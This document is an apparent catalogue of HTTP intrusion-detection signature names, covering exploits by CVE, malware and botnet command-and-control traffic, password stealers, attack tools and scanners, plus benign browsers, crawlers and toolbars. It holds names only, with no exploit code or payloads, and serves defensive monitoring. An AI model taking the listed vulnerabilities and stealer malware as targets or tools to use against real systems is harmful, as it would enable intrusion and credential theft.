HTTP_CSH-Dialerpornpaq
HTTP_CSH-Digium-Asterisk-HTTP-Management-Interface-Stack-Overflow
HTTP_CSH-Digium-Asterisk-HTTP-Manager-Interface-Resource-Exhaustion
HTTP_CSH-Digmine-Cryptocurrency-Miner
HTTP_CSH-Directory-Traversal-In-Cookie-Header
HTTP_CSH-Directory-Traversal-In-Session-Id-Cookie
HTTP_CSH-Dirtjumper-Traffic
HTTP_CSH-Django-Get_Supported_Language_Variant-Denial-Of-Service
HTTP_CSH-Django-Parse_accept_Lang_Header-Accept-Language-Resource-Exhaustion
HTTP_CSH-DotBot-Web-Spider
HTTP_CSH-DotNetNuke-Cookie-Deserialization-RCE
HTTP_CSH-Dreamloader-Bot-Traffic
HTTP_CSH-Droidpak-Traffic
HTTP_CSH-Ebates-Moneymaker
HTTP_CSH-Edge-Browser-Usage
HTTP_CSH-EFS-Software-Easy-File-Management-Web-Server-Userid-Buffer-Overflow
HTTP_CSH-EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow
HTTP_CSH-EFS-Software-Easy-File-Sharing-Web-Server-Vfolder.ghp-Stack-Buffer-Overflow
HTTP_CSH-Ekeoil-Malware-C2-Traffic
HTTP_CSH-Electron-Based-Application-Usage
HTTP_CSH-Elog-Project-Elog-Retrieve_URL-Information-Disclosure
HTTP_CSH-Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service
HTTP_CSH-Empty-Host-Header
HTTP_CSH-Enhanced-CTorrent-P2P-Client
HTTP_CSH-Entireweb-Speedy-Web-Spider
HTTP_CSH-ESSP-Connection-Request
HTTP_CSH-Euniverse-Perfectnav
HTTP_CSH-Exalead-Exabot-Web-Spider
HTTP_CSH-ExB-Language-Crawler
HTTP_CSH-Excessively-Large-Content-Length-Value
HTTP_CSH-Excessively-Long-Basic-Authorization-Header
HTTP_CSH-Exploit-Specific-Shared-Variables
HTTP_CSH-Ezula
HTTP_CSH-F-Prot-Anti-Virus-Update-Agent-Usage
HTTP_CSH-F-Secure-ORSP-Client-User-Agent
HTTP_CSH-F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986
HTTP_CSH-F5-Request-Smuggling-CVE-2023-46747
HTTP_CSH-FakeLookout-Traffic
HTTP_CSH-Fareit-4-Traffic
HTTP_CSH-Fastify-Contenttypeparser-Denial-Of-Service
HTTP_CSH-FDM-P2P-Client
HTTP_CSH-Felismus-Malware-Request
HTTP_CSH-File-Name-Directory-Traversal
HTTP_CSH-Firefox-Browser-Usage
HTTP_CSH-Foreign-Botnet-Traffic
HTTP_CSH-Fortinet-FortiOS-Authentication-Bypass-CVE-2024-55591
HTTP_CSH-FortiOS-Authentication-Bypass-CVE-2022-40684
HTTP_CSH-FreeBSD-Portscout-Usage
HTTP_CSH-FreePBX-Framework-Asterisk-Recording-Interface-Unserialize-Code-Execution
HTTP_CSH-FunWebProducts-Activity
HTTP_CSH-FunWebProducts-mywebsearch-Toolbar
HTTP_CSH-Furtims-Parent-Nullptr-Host-Field
HTTP_CSH-Gain-Publishing-Installer
HTTP_CSH-Gator-User-Agent
HTTP_CSH-Gauss-Bot-Traffic-Detected
HTTP_CSH-Generic-Java-Application
HTTP_CSH-GitHub-Enterprise-Default-Session-Secret-And-Deserialization-Vulnerability
HTTP_CSH-GlobalSpec-Ocelli-Web-Spider
HTTP_CSH-Gogs-File-Upload-Tree_path-Command-Injection
HTTP_CSH-Google-Desktop-Usage
HTTP_CSH-Googlebot-Image-Web-Spider
HTTP_CSH-Googlebot-Mediapartners-Web-Spider
HTTP_CSH-Googlebot-Mobile-Web-Spider
HTTP_CSH-Googlebot-Web-Spider
HTTP_CSH-GoogleEarth-Usage
HTTP_CSH-Grendel-Scan-Vulnerability-Scanner-Usage
HTTP_CSH-GroundWork-Monitor-Monarch-Scan-Ref-1
HTTP_CSH-Haproxy-Client-And-Server-Cookie-Parsing-Denial-Of-Service
HTTP_CSH-Haproxy-Empty-Header-Name-Access-Control-Bypass
HTTP_CSH-Haproxy-HTTP-Header-Handling-Integer-Overflow-Vulnerability
HTTP_CSH-Havij-SQL-Injection-Tool-Usage
HTTP_CSH-Header-Integer-Percent-Encoding
HTTP_CSH-Herpsnet-Bot-Traffic
HTTP_CSH-Home-Router-UPnP-Flash-Vulnerability
HTTP_CSH-Hongtoutou-Adrd-Bot-Traffic-Detected
HTTP_CSH-Hotbar-Activity
HTTP_CSH-Hotbar-Install
HTTP_CSH-Hotbar-Weather-Service-Activity
HTTP_CSH-HP-Managed-Printing-Administration-Remote-Command-Execution
HTTP_CSH-HP-OpenView-Network-Node-Manager-Ovalarm.exe-Accept-Lang-BOF
HTTP_CSH-HP-OpenView-Network-Node-Manager-OvJavaLocale-Buffer-Overflow
HTTP_CSH-HP-OpenView-Network-Node-Manager-OvOSLocale-Buffer-Overflow
HTTP_CSH-HP-OpenView-Nnmrptconfig-Schd-And-Nameparams-Potential-BOF
HTTP_CSH-HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution
HTTP_CSH-HP-Operations-Manager-Server-Unauthorized-File-Upload
HTTP_CSH-HPE-Integrated-Lights-Out-CVE-2017-12542
HTTP_CSH-HS.fi-iPhone-Application-Usage
HTTP_CSH-HTTP2-Upgrade-Header
HTTP_CSH-Httper
HTTP_CSH-HTTrack-Tool-Usage
HTTP_CSH-Hulu-Access
HTTP_CSH-HuntBar-Download
HTTP_CSH-Hupigon.AIPM-Traffic
HTTP_CSH-IBM-Cognos-Server-Backdoor-Account-Remote-Code-Execution
HTTP_CSH-IBM-Rational-Quality-Manager-And-Test-Lab-Manager-Policy-Bypass
HTTP_CSH-IBM-WebSphere-Waspostparam-Cookie-Untrusted-Java-Deserialization
HTTP_CSH-IcedID-Trojan-Infection-Traffic
HTTP_CSH-Iceweasel-Browser-Usage
HTTP_CSH-IEPlugin
HTTP_CSH-IIS-Asp-Chunked-Encoding-Transfer-Heap-Overflow
HTTP_CSH-IIS-Htr-Chunked-Transfer-Encoding-Vulnerability
HTTP_CSH-iMatix-Corporation-Xitami-Web-Server-BOF
HTTP_CSH-iMesh-Toolbar-Popup-Content-Request
HTTP_CSH-iMesh-Toolbar-Search
HTTP_CSH-Incredifind
HTTP_CSH-Internet-Explorer-10.x-Browser-Compatibility-Mode-Usage
HTTP_CSH-Internet-Explorer-10.x-Browser-Usage
HTTP_CSH-Internet-Explorer-11.x-Browser-Compatibility-Mode-Usage
HTTP_CSH-Internet-Explorer-11.x-Browser-Usage
HTTP_CSH-Internet-Explorer-2.x-Browser-Usage
HTTP_CSH-Internet-Explorer-3.x-Browser-Usage
HTTP_CSH-Internet-Explorer-4.x-Browser-Usage
HTTP_CSH-Internet-Explorer-5.x-Browser-Usage
HTTP_CSH-Internet-Explorer-6.x-Browser-Usage
HTTP_CSH-Internet-Explorer-7.x-Browser-Usage
HTTP_CSH-Internet-Explorer-8.x-Browser-Compatibility-Mode-Usage
HTTP_CSH-Internet-Explorer-8.x-Browser-Usage
HTTP_CSH-Internet-Explorer-9.x-Browser-Compatibility-Mode-Usage
HTTP_CSH-Internet-Explorer-9.x-Browser-Usage
HTTP_CSH-Internet-Explorer-Browser-Plugin-Usage
HTTP_CSH-Internet-Explorer-Browser-Usage
HTTP_CSH-Internetoptimizer
HTTP_CSH-Invalid-Ascii-In-HTTP-Header
HTTP_CSH-Invalid-Authorization
HTTP_CSH-Invalid-Base64-Cookie
HTTP_CSH-Invalid-Basic-Authentication-Base64
HTTP_CSH-Invalid-Host-Header
HTTP_CSH-Invalid-HTTP-Request-Header-Field
HTTP_CSH-Invalid-Negative-Content-Length-Value
HTTP_CSH-IP-Address-As-HTTP-Host
HTTP_CSH-ISR-Stealer-C2-Traffic
HTTP_CSH-ISTBar-Activity
HTTP_CSH-ISTBar-Install
HTTP_CSH-ISTBar-Popup-Instructions-Download
HTTP_CSH-Ivanti-Cloud-Services-Appliance-(CSA)-Command-Injection
HTTP_CSH-Ivanti-Connect-Secure-Buffer-Overflow-CVE-2025-22457
HTTP_CSH-Java-6-Usage
HTTP_CSH-Java-6-Version-1.6.0-Usage
HTTP_CSH-Java-6-Version-1.6.0_01-Usage
HTTP_CSH-Java-6-Version-1.6.0_02-Usage
HTTP_CSH-Java-6-Version-1.6.0_03-Usage
HTTP_CSH-Java-6-Version-1.6.0_04-Usage
HTTP_CSH-Java-6-Version-1.6.0_05-Usage
HTTP_CSH-Java-6-Version-1.6.0_06-Usage
HTTP_CSH-Java-6-Version-1.6.0_07-Usage
HTTP_CSH-Java-6-Version-1.6.0_08-Usage
HTTP_CSH-Java-6-Version-1.6.0_09-Usage
HTTP_CSH-Java-6-Version-1.6.0_10-Usage
HTTP_CSH-Java-6-Version-1.6.0_11-Usage
HTTP_CSH-Java-6-Version-1.6.0_12-Usage
HTTP_CSH-Java-6-Version-1.6.0_13-Usage
HTTP_CSH-Java-6-Version-1.6.0_14-Usage
HTTP_CSH-Java-6-Version-1.6.0_15-Usage
HTTP_CSH-Java-6-Version-1.6.0_16-Usage
HTTP_CSH-Java-6-Version-1.6.0_17-Usage
HTTP_CSH-Java-6-Version-1.6.0_18-Usage
HTTP_CSH-Java-6-Version-1.6.0_19-Usage
HTTP_CSH-Java-6-Version-1.6.0_20-Usage
HTTP_CSH-Java-6-Version-1.6.0_21-Usage
HTTP_CSH-Java-6-Version-1.6.0_22-Usage
HTTP_CSH-Java-6-Version-1.6.0_23-Usage
HTTP_CSH-Java-6-Version-1.6.0_24-Usage
HTTP_CSH-Java-7-Usage
HTTP_CSH-Java-7-Version-1.7.0_01-Usage
HTTP_CSH-Java-7-Version-1.7.0_02-Usage
HTTP_CSH-Java-7-Version-1.7.0_03-Usage
HTTP_CSH-Java-7-Version-1.7.0_04-Usage
HTTP_CSH-Java-7-Version-1.7.0_05-Usage
HTTP_CSH-Java-7-Version-1.7.0_06-Usage
HTTP_CSH-Java-7-Version-1.7.0_07-Usage
HTTP_CSH-Java-7-Version-1.7.0_09-Usage
HTTP_CSH-Java-7-Version-1.7.0_10-Usage
HTTP_CSH-Java-7-Version-1.7.0_11-Usage
HTTP_CSH-Java-8-Usage
HTTP_CSH-Joltid-Peerenabler
HTTP_CSH-Joomla-JCE-Vulnerability-Crawler
HTTP_CSH-Joomla-Remote-Code-Execution-Vulnerability
HTTP_CSH-Jyxobot-Web-Spider
HTTP_CSH-Keenvalue
HTTP_CSH-Kelihos-Bot-Activity
HTTP_CSH-Known-Exploit-Kit-Headers
HTTP_CSH-Konqueror-Browser-Usage
HTTP_CSH-KTorrent-Client
HTTP_CSH-Laravel-Framework-Unusual-X-XSRF-TOKEN-Length
HTTP_CSH-Large-Content-Length-Value-In-SRMP-POST-Request
HTTP_CSH-Legacy-Chakra-Based-Microsoft-Edge-Usage
HTTP_CSH-Lexmark-Markvision-Enterprise-Remote-Code-Execution
HTTP_CSH-LG-LED-Assistant-API-Changepw-Unverified-Password-Reset
HTTP_CSH-LibWhisker-Nikto-Scan-Detect
HTTP_CSH-Libwww-Perl-User-Agent
HTTP_CSH-Lighttpd-Connection-Header-Parsing-Denial-Of-Service
HTTP_CSH-Lighttpd-Host-Header-Multiple-Vulnerabilities
HTTP_CSH-Lighttpd-Mod_Extforward-Plugin-Mod_extforward_Forwarded-Denial-Of-Service
HTTP_CSH-Limewire-User-Agent
HTTP_CSH-Linux-Backdoor-C2-Traffic
HTTP_CSH-Locky-B-Control-Traffic
HTTP_CSH-Logitech-Desktop-Messenger-Backweb-Update
HTTP_CSH-Long-Basic-Authorization-Header
HTTP_CSH-Long-Range-Or-Range-Request-Header
HTTP_CSH-Long-Referer-Header-Detected
HTTP_CSH-Lop
HTTP_CSH-Lynx-Browser-Usage
HTTP_CSH-Maazben-Bot-Traffic
HTTP_CSH-MailEnable-HTTP-Authorization-Header-Buffer-Overflow
HTTP_CSH-Mama-Casper-Attack-Tool-Detected
HTTP_CSH-Manageengine-EventLog-Analyzer-Cross-Site-Request-Forgery
HTTP_CSH-Marketscore-OSSProxy-Internet-Accelerator-User-Agent
HTTP_CSH-McAfee-Epolicy-Orchestrator-DoS
HTTP_CSH-McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution
HTTP_CSH-McAfee-Web-Gateway-Usage
HTTP_CSH-Media-Viewer-StubInstStat-User-Agent
HTTP_CSH-MegaRAC-Authentication-Bypass-Via-Redfish-CVE-2024-54085
HTTP_CSH-Microsoft-.NET-Framework-Information-Disclosure-CVE-2024-29059
HTTP_CSH-Microsoft-ADFS-Remote-Code-Execution-CVE-2009-2509
HTTP_CSH-Microsoft-Bing-Web-Spider
HTTP_CSH-Microsoft-BITS-Usage
HTTP_CSH-Microsoft-CryptoAPI-Usage
HTTP_CSH-Microsoft-Exchange-Authentication-Bypass-CVE-2021-33766
HTTP_CSH-Microsoft-Exchange-Server-SSRF-Vulnerability-CVE-2021-26855
HTTP_CSH-Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow
HTTP_CSH-Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow-2
HTTP_CSH-Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-30080
HTTP_CSH-Microsoft-Negotiate-SSP-Buffer-Overflow
HTTP_CSH-Microsoft-OWA-XSS-Vulnerability-CVE-2015-1628
HTTP_CSH-Microsoft-Remote-Code-Execution-IIS-CVE-2015-1635
HTTP_CSH-Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357
HTTP_CSH-Microsoft-Windows-DLL-Hijack-Vulnerability
HTTP_CSH-Microsoft-Windows-Remote-Desktop-Protocol-Over-WebSocket
HTTP_CSH-Microsoft-Windows-RSS-Platform-Usage
HTTP_CSH-Microsoft-Windows-Update-Agent-Usage
HTTP_CSH-Microsoft-WNS-Message-User-Agent
HTTP_CSH-Microsoft-WSDAPI-Memory-Corruption-MS09-063
HTTP_CSH-Microsoft_IIS_5.0_WebDav_Request_Directory_Security_Bypass
HTTP_CSH-Microsys-PROMOTIC-Pmbase64decode-Buffer-Overflow
HTTP_CSH-Morcut-Malware-Traffic-Detected
HTTP_CSH-Morfeus-Scanner-Usage
HTTP_CSH-MOVEit-Transfer-SQL-Injection-Post-Exploit
HTTP_CSH-Mozi-Botnet-Traffic
HTTP_CSH-Mozilla-Minefield-Browser-Usage
HTTP_CSH-Mozilla-SeaMonkey-Browser-Usage
HTTP_CSH-MS-Forefront-UAG-Null-Session-Cookie-Crash-Vulnerability
HTTP_CSH-MS-Suspicious-Headers-Detected
HTTP_CSH-MSN-Live-Messenger-Over-HTTP
HTTP_CSH-MSNBot-Media-Web-Spider
HTTP_CSH-MSNBot-Web-Spider
HTTP_CSH-Mumblehard-Spambot-Traffic
HTTP_CSH-Native-PowerShell-User-Agent
HTTP_CSH-Need2Find-Toolbar-Activity
HTTP_CSH-Negative-Content-Length-Value
HTTP_CSH-Netcraft-Crawler
HTTP_CSH-Netgain-Systems-Enterprise-Manager-Settings.upload-Filename-Directory-Traversal
HTTP_CSH-Netgate-Pfsense-Pfblockerng-Host-Command-Injection
HTTP_CSH-Netscape-Browser-Usage
HTTP_CSH-Netshagg
HTTP_CSH-New.Net-Toolbar-Activity
HTTP_CSH-Newdotnet
HTTP_CSH-NewsGator-NetNewsWire-Usage
HTTP_CSH-Next.js-Middleware-Security-Control-Bypass-CVE-2025-29927
HTTP_CSH-Next.js-Possible-Middleware-Security-Control-Bypass-CVE-2025-29927
HTTP_CSH-Nginx-0-Length-Headers-Leak-Denial-Of-Service
HTTP_CSH-Nikto-Scan-Detect-By-User-Agent
HTTP_CSH-NMAP-Web-Scanning-Activity
HTTP_CSH-Node.js-Llhttp-Module-Transfer-Encoding-Handling-HTTP-Request-Smuggling
HTTP_CSH-Novell-eDirectory-CVE-2006-5478
HTTP_CSH-Novell-eDirectory-Soap-Handling-Accept-Language-Header-Heap-Overflow
HTTP_CSH-Novell-Remote-Manager-Off-By-One-Denial-Of-Service
HTTP_CSH-NTLM-Authentication-Usage
HTTP_CSH-NTT-Resonant-Ichiro-Mobile-Web-Spider
HTTP_CSH-Nullsoft-Scriptable-Installation-System-Download-Plugin
HTTP_CSH-Nutch-Open-Source-Robot
HTTP_CSH-Obsolete-Chrome-Browser-Usage
HTTP_CSH-Obsolete-Edge-Browser-Usage
HTTP_CSH-Obsolete-Firefox-Browser-Usage
HTTP_CSH-Obsolete-Safari-Browser-Usage
HTTP_CSH-Octoshape-P2P-Plugin
HTTP_CSH-Oficla-Traffic
HTTP_CSH-OneDev-Platform-Attachmentuploadservet-Insecure-Deserialization
HTTP_CSH-OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246
HTTP_CSH-Onlinegame-Worm-Trojan-Magania
HTTP_CSH-OPC-UA-HTTP/XML-Shared-Variables
HTTP_CSH-OpenVAS-Scan-Detect-By-User-Agent
HTTP_CSH-Opera-BitTorrent-Client
HTTP_CSH-Opera-Browser-Usage
HTTP_CSH-Opera-Mini-Browser-Usage
HTTP_CSH-Oracle-Application-Testing-Suite-Uploadservlet-Filename-Directory-Traversal
HTTP_CSH-Oracle-Web-Cache-Unspecified-Client-Request-Handling-1
HTTP_CSH-Overly-Long-Host-Header-Field
HTTP_CSH-Oversized-Host-Header-Field
HTTP_CSH-OWASP-CoreRule-Request-944-Application-Attack-Java-944130
HTTP_CSH-P2P-Phex-Client
HTTP_CSH-P2P-SoulSeek-Client
HTTP_CSH-P2P-uTorrent-Client
HTTP_CSH-Palo-Alto-SSLVPN-Authentication-Bypass
HTTP_CSH-PAN-OS-GlobalProtect-Command-Injection-CVE-2024-3400
HTTP_CSH-Pear-HTTP_request-Php-Extension-Package
HTTP_CSH-PeerCast-HTTP-Authentication-Buffer-Overflow
HTTP_CSH-Pgadmin-Pga4_session-Directory-Traversal
HTTP_CSH-Phishing-URL-Accessed
HTTP_CSH-PHP-4-Unserialize-ZVAL-Reference-Counter-Overflow
HTTP_CSH-PHP-HTTP-Multipart-Form-Data-Denial-Of-Service
HTTP_CSH-Php-Scripting-In-Client-Request
HTTP_CSH-Picsearch-psbot-Web-Spider
HTTP_CSH-Pivotal-RabbitMQ-X-reason-HTTP-Header-Denial-Of-Service
HTTP_CSH-Platrium-Weather-Service-Cookie
HTTP_CSH-Platrium-Weather-Service-User-Agent
HTTP_CSH-Plugx-Trojan-Activity-Detected
HTTP_CSH-PopCap-UserAgent
HTTP_CSH-Popmonster
HTTP_CSH-Portalscan
HTTP_CSH-Possible-HTTP-Request-In-Trailers
HTTP_CSH-Possible-Netstat-Command-Usage-In-Referer-Header
HTTP_CSH-Possible-Ping-Command-Usage-In-Referer-Header
HTTP_CSH-Possible-Script-In-Header
HTTP_CSH-Possible-SQL-Injection
HTTP_CSH-PPStream-Client-Usage
HTTP_CSH-Precisionpop
HTTP_CSH-Progress-Kemp-Loadmaster-Rest-API-Command-Injection
HTTP_CSH-Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection
HTTP_CSH-Progress-MOVEit-Transfer-SQL-Injection-CVE-2023-34362
HTTP_CSH-Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection
HTTP_CSH-ProSafe-Management-System-Arbitrary-File-Upload-Vulnerability
HTTP_CSH-Proxy-Header
HTTP_CSH-PycURL-Crawler
HTTP_CSH-Python-Urllib-Robot
HTTP_CSH-Pyxie-RAT-Infection-Traffic
HTTP_CSH-QQ-Password-Stealer
HTTP_CSH-Radian6-RSS-Feed-Crawler
HTTP_CSH-RapidShare-Access
HTTP_CSH-RealNetworks-Helix-Server-NTLM-Authentication-Heap-Overflow
HTTP_CSH-Realtek-SDK-UPnP-Callback-Stack-Buffer-Overflow-CVE-2021-35392
HTTP_CSH-Red-Hat-Directory-Server-Accept-Language-Parsing-Buffer-Overflow
HTTP_CSH-Red-October-Activity
HTTP_CSH-Redgirl-Bot-Traffic
HTTP_CSH-Redline-Password-Stealer-Infection-Traffic
HTTP_CSH-Referer-XSS
HTTP_CSH-Request-With-Multiple-Header-Lines-With-Empty-Content
HTTP_CSH-Rhino-Software-Serv-U-Web-Client-Request-Remote-Buffer-Overflow
HTTP_CSH-rtorrent-Client
HTTP_CSH-Ruby-WEBrick-Denial-Of-Service
HTTP_CSH-RubyGems-Usage
HTTP_CSH-RX-Toolbar-Activity
HTTP_CSH-Safari-Browser-Usage
HTTP_CSH-Sality-Virus-User-Agent
HTTP_CSH-Samba-Swat-HTTP-Authentication-Buffer-Overflow
HTTP_CSH-Samsung-Browser-Usage
HTTP_CSH-SAP-Internet-Communication-Manager-HTTP-Request-Smuggling
HTTP_CSH-Sapphire-Web-Spider
HTTP_CSH-SaveNow-Activity
HTTP_CSH-Schneider-Electric-ClearSCADA-DoS2
HTTP_CSH-Schneider-Electric-Modicon-M340-Buffer-Overflow-Vulnerability
HTTP_CSH-ScoutJet-Web-Spider
HTTP_CSH-Script-In-Host-Header
HTTP_CSH-Searchme-Charlotte-Web-Spider
HTTP_CSH-Searchmyrequest
HTTP_CSH-Shady-RAT-Backdoor-Traffic
HTTP_CSH-Shareaza-P2P-Client
HTTP_CSH-Shared-Variables
HTTP_CSH-ShellCode-In-User-Agent
HTTP_CSH-Shopathome
HTTP_CSH-Shopnav
HTTP_CSH-Sitecore-Multiple-Products-ThumbnailsAccessToken-Insecure-Deserialization-CVE-2025-27218
HTTP_CSH-SNIProxy-New_address-Stack-Buffer-Overflow
HTTP_CSH-Solarwinds-Web-Help-Desk-Hard-Coded-Credentials
HTTP_CSH-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
HTTP_CSH-SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704
HTTP_CSH-Sony-PlayStation-3-Browser-Detected
HTTP_CSH-Spotify-Usage
HTTP_CSH-Spring-Cloud-Function-Spel-Code-Injection-CVE-2022-22963
HTTP_CSH-SpyLocked-Application-Usage
HTTP_CSH-Spyware-Webhancer
HTTP_CSH-SQL-Injection-Attack-Tool-Detected
HTTP_CSH-SQL-Injection-In-Referer-Header-Field
HTTP_CSH-SQL-Union-Select
HTTP_CSH-Sqlmap-SQL-Injection-Tool-Usage
HTTP_CSH-Squid-HTTP-Host-Header-Port-Handling-Denial-Of-Service
HTTP_CSH-Squid-HTTP-Response-Processing-Denial-Of-Service
HTTP_CSH-Squid-Httpmakevarymark-Header-Value-DoS
HTTP_CSH-Squid-NTLM-Buffer-Overflow
HTTP_CSH-Squid-Proxy-Cache-Cachemgr.cgi-Resource-Exhaustion
HTTP_CSH-Squid-Proxy-Digest-Nc-Heap-Buffer-Overflow
HTTP_CSH-Squid-Proxy-HTTP-Header-Parser-Denial-Of-Service
HTTP_CSH-Squid-Proxy-HTTP-Message-Processing-Buffer-Overread
HTTP_CSH-Squid-Proxy-HTTP-X-Forwarded-For-Header-Handling-Denial-Of-Service
HTTP_CSH-Squid-Proxy-Range-Header-DoS
HTTP_CSH-Squid-Proxy-String-Processing-Null-Pointer-Dereference
HTTP_CSH-Squid-Range-Header-Denial-Of-Service
HTTP_CSH-Squid-Strhdracptlanggetitem-Value-Denial-Of-Service
HTTP_CSH-Srng
HTTP_CSH-Stonesoft-SMC-Usage
HTTP_CSH-Storm-Bot-Activity
HTTP_CSH-Subversion-Usage
HTTP_CSH-Sun-Java-System-Web-Server-Digest-Authorization-Buffer-Overflow-2
HTTP_CSH-Sun-Java-Update-Agent
HTTP_CSH-SunBurst-Backdoor-Traffic
HTTP_CSH-Suspected-Cross-Site-Scripting-Attempt
HTTP_CSH-Suspicious-Header
HTTP_CSH-Suspicious-If-Modified-Since-Header
HTTP_CSH-Suspicious-Non-Standard-Host-Header
HTTP_CSH-Suspicious-Range-Header
HTTP_CSH-Suspicious-Software-Download
HTTP_CSH-Suspicious-User-Agent-WinHTTP-Loader
HTTP_CSH-Suspicious-WebDav-Request-To-Known-TCP-Tunneling-Services
HTTP_CSH-Swish-e-Web-Spider
HTTP_CSH-Symantec-Messaging-Gateway-Save.do-Cross-Site-Request-Forgery
HTTP_CSH-Symantec-Web-Gateway-OS-Command-Injection
HTTP_CSH-System-File-Over-WebDAV
HTTP_CSH-TBK-DVR4104-And-DVR4216-Authentication-Bypass-CVE-2018-9995
HTTP_CSH-Tdss.c-Trojan-Traffic
HTTP_CSH-TeamViewer-DynGate-Request
HTTP_CSH-ThinkPHP-Local-File-Inclusion-CVE-2022-47945
HTTP_CSH-Tijcont.A-Traffic
HTTP_CSH-Tinyproxy-HTTP-Connection-Headers-Use-After-Free
HTTP_CSH-Tinyproxy-HTTP-Connection-Headers-Use-After-Free-CVE-2023-49606
HTTP_CSH-Tizen-Browser-Usage
HTTP_CSH-Tofu-Backdoor-Request
HTTP_CSH-Traccar-Path-Traversal-CVE-2024-24809
HTTP_CSH-Transfer-Encoding-Chunked
HTTP_CSH-Transfer-Encoding-Compress
HTTP_CSH-Transfer-Encoding-Deflate
HTTP_CSH-Transfer-Encoding-Gzip
HTTP_CSH-Transfer-Encoding-Identity
HTTP_CSH-Transfer-Encoding-Invalid
HTTP_CSH-Transfer-Encoding-Overflow
HTTP_CSH-Transmission-P2P-Client
HTTP_CSH-Transponder
HTTP_CSH-Trend-Micro-Control-Manager-Chunked-Encoding-Buffer-Overflow
HTTP_CSH-Trend-Micro-Endpoint-Application-Control-Filedrop-Directory-Traversal
HTTP_CSH-Trend-Micro-Threat-Discovery-Appliance-Remote-Command-Execution
HTTP_CSH-Trojan-Downloader-Agent
HTTP_CSH-Trojan-Downloader-Shexie
HTTP_CSH-Trojan-Downloader-Vb
HTTP_CSH-TSL-Attack-Tool-Detected
HTTP_CSH-TurnitinBot-Web-Spider
HTTP_CSH-Twiceler-Web-Spider
HTTP_CSH-Ubuntu-Advanced-Packaging-Tool
HTTP_CSH-Unidentified-Chrome-Browser-Usage
HTTP_CSH-Unidentified-Edge-Browser-Usage
HTTP_CSH-Unidentified-Firefox-Browser-Usage
HTTP_CSH-Unidentified-Safari-Browser-Usage
HTTP_CSH-Unknown-Browser
HTTP_CSH-Unusual-IP-Address-Format-Used-In-HTTP-Request
HTTP_CSH-Up-To-Date-Chrome-Browser-Usage
HTTP_CSH-Up-To-Date-Edge-Browser-Usage
HTTP_CSH-Up-To-Date-Firefox-Browser-Usage
HTTP_CSH-Up-To-Date-Safari-Browser-Usage
HTTP_CSH-User-Agent-Microsoft-Symbol-Server
HTTP_CSH-User-Agent-Processed
HTTP_CSH-User-Agent-VCSoapClient
HTTP_CSH-User-Agent-Windows
HTTP_CSH-UUSee-Activity
HTTP_CSH-Valve-Steam-Usage
HTTP_CSH-Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service
HTTP_CSH-Vawtrak-Botnet-Traffic
HTTP_CSH-Very-Long-Accept-Header
HTTP_CSH-Very-Long-Cookie-Header
HTTP_CSH-ViperSoftX-C2-Traffic
HTTP_CSH-VMware-Vcenter-Server-Ssooverrestverifierutil-Denial-Of-Service
HTTP_CSH-w3af-Scan-Detect-By-User-Agent
HTTP_CSH-Waledac-Bot-Traffic
HTTP_CSH-Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow
HTTP_CSH-WebCake-Traffic
HTTP_CSH-WebLog-Expert-Denial-of-Service-CVE-2018-7582
HTTP_CSH-WebSocket-Connection-Request
HTTP_CSH-Webtrends-Security-Analyzer-Usage
HTTP_CSH-Western-Digital-Arkeia-Unauthenticated-Script-Upload
HTTP_CSH-Wget-Tool-Usage
HTTP_CSH-Wholesale-Directory-Toolbar
HTTP_CSH-Windfind
HTTP_CSH-Windows-HTTP.sys-DOS-Vulnerability-CVE-2013-1305
HTTP_CSH-Windows-Media-Player-Usage
HTTP_CSH-Windows-Style-Absolute-Path-In-Referer-Header
HTTP_CSH-Windows-WebDAV-Access
HTTP_CSH-Wnad
HTTP_CSH-Wordpress-Contact-Form-Entries-Plugin-Stored-Cross-Site-Scripting
HTTP_CSH-Wordpress-Limit-Login-Attempts-Plugin-Stored-Cross-Site-Scripting
HTTP_CSH-Wordpress-PHPMailer-Host-Header-Command-Injection
HTTP_CSH-Wordpress-RSS-Feed-Generator-Self_Link-HTTP_Host-Cross-Site-Scripting
HTTP_CSH-Wordpress-Shield-Security-Plugin-Activity-Log-Stored-Cross-Site-Scripting
HTTP_CSH-Wordpress-WP-Fastest-Cache-Plugin-SQL-Injection-CVE-2023-6063
HTTP_CSH-X86-ShellCode-Detect
HTTP_CSH-Xupiter-Toolbar
HTTP_CSH-Yahoo-MMCrawler-Web-Spider
HTTP_CSH-Yahoo-Slurp-Web-Spider
HTTP_CSH-Yandex-Web-Spider
HTTP_CSH-Your-Freedom-HTTP-Request
HTTP_CSH-YouTube-Access
HTTP_CSH-Zango-Toolbar
HTTP_CSH-Zbot-Traffic
HTTP_CSH-Zeppelin-Ransomware-Infection-Traffic
HTTP_CSH-ZeroAccess-Traffic
HTTP_CSH-Zeus-Botnet-Communication-Detected
HTTP_CSH-ZGrab-Network-Scanner-User-Agent
HTTP_CSH-Zimbra-Collaboration-Memcached-Command-Injection-In-CookieCVE-2022-27924
HTTP_CSH-Zloader-Malware-C2-Traffic
HTTP_CSH-ZmEu-Scanner-Usage
HTTP_CSH-Zoho-Manageengine-Desktopcentral-Authentication-Bypass-CVE-2021-44515
HTTP_CSH_FortiOS-Ssl-VPN-Heap-Buffer-Overflow-CVE-2022-42475
HTTP_CSH_Zabbix-Unsafe-Client-Side-Session-Storage-CVE-2022-23131
HTTP_CSR-Hashicorp-Consul-Remote-Command-Execution
HTTP_CSR-HPE-Intelligent-Management-Center-Perfselecttask-Expression-Language-Injection
HTTP_CSR-Mailcleaner-Remote-Code-Execution
HTTP_CSR-Squid-Proxy-Cachemgr.cgi-Reflected-Cross-Site-Scripting
HTTP_CSU-2020search
HTTP_CSU-3Com-Airconnect-Web-Interface-Usage
